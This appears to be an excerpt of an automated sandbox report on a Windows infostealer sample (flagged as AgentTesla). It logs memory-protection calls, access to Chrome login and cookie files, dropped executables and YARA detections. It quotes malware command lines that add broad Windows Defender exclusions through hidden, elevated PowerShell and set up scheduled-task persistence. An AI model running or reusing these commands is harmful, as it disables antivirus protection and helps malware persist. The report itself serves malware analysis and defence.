NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755dc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75988000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75988000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ec000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75988000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75988000 process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 604 crashed
__exception__ April 24, 2023, 8:45 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 141880096 registers.r15: 141880536 registers.rcx: 1412 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 172011264 registers.rsp: 141879256 registers.r11: 141883792 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1416 registers.r12: 33068976 registers.rbp: 141879408 registers.rdi: 32953760 registers.rax: 5910016 registers.r13: 141879968	1	0	0

Steals private information from local Internet browsers (50 out of 83 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Favicons-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Service Worker\Database
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Top Sites-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Current Session
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\GPUCache\data_3
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\CrashpadMetrics.pma~RF3a15fe.TMP
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Safe Browsing Cookies-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\History-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Application Cache\Index
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Local Storage\leveldb\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Local Storage
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\History Provider Cache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Visited Links
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Origin Bound Certs
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Safe Browsing Channel IDs-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\chrome_shutdown_ms.txt
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Safe Browsing Channel IDs
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\previews_opt_out.db-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Local Storage\leveldb\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Favicons
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Network Persistent State
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\QuotaManager
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\TransportSecurity
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Application Cache\Cache
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Web Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Current Tabs
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Local Storage\leveldb\000004.log
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Default\Network Action Predictor

Looks up the external IP address (1 event)

domain

ip-api.com

Creates executable files on the filesystem (3 events)

file	C:\Windows\Temp\11.exe
file	C:\Windows\Temp\123.exe
file	C:\Windows\Temp\321.exe

Creates a shortcut to an executable file (1 event)

file	C:\Windows\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	schtasks /create /sc daily /st 12:00 /f /tn "RegSvcs" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
cmdline	powershell "Start-Process <#xkagfzgnanuo#> powershell <#xkagfzgnanuo#> -Verb <#xkagfzgnanuo#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

Drops a binary and executes it (3 events)

file	C:\Windows\Temp\11.exe
file	C:\Windows\Temp\123.exe
file	C:\Windows\Temp\321.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 2208 thread_handle: 0x000004c4 process_identifier: 2236 current_directory: filepath: track: 1 command_line: powershell "Start-Process <#xkagfzgnanuo#> powershell <#xkagfzgnanuo#> -Verb <#xkagfzgnanuo#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000004c8	1	1	0
ShellExecuteExW April 24, 2023, 8:52 a.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7efa0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 24, 2023, 8:52 a.m.	flags: 1158 family: 0	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x0000e200', u'virtual_address': u'0x0005d000', u'entropy': 6.802287495720708, u'name': u'.rsrc', u'virtual_size': u'0x0000e034'}

entropy

6.80228749572

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 24, 2023, 8:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 24, 2023, 8:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 24, 2023, 8:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 24, 2023, 8:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (50 out of 1100 events)

url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	http://crbug.com/122474.
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	http://crbug.com/320723
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	http://crbug.com/312900.
url	https://www.gstatic.com/chrome/ntp/doodle_test/ddljson_desktop3.json
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html
url	https://www.globalsign.com/repository/03
url	http://www.startssl.com/sfsca.crl0
url	http://UA-Compatible
url	https://se.search.yahoo.com/search?ei=
url	http://EVSecure-ocsp.geotrust.com0
url	https://developers.google.com/web/fundamentals/accessibility/accessible-styles
url	https://mammoth.ct.comodo.com/

Yara rule detected in process memory (50 out of 1082 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Perform crypto currency mining	rule	BitCoin
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	browser info stealer	rule	infoStealer_browser_Zero
description	Steal credential	rule	local_credential_Steal
description	Virtual currency	rule	Virtual_currency_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Perform crypto currency mining	rule	BitCoin
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	browser info stealer	rule	infoStealer_browser_Zero
description	Steal credential	rule	local_credential_Steal
description	Virtual currency	rule	Virtual_currency_Zero

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: AddressBook base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: Connection Manager base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: DirectDrawEx base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: EditPlus base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: ENTERPRISE base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: Fontcore base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: Google Chrome base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: IE40 base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: IE4Data base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: IE5BAKEX base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: IEData base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: MobileOptionPack base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: SchedulingAgent base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: WIC base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
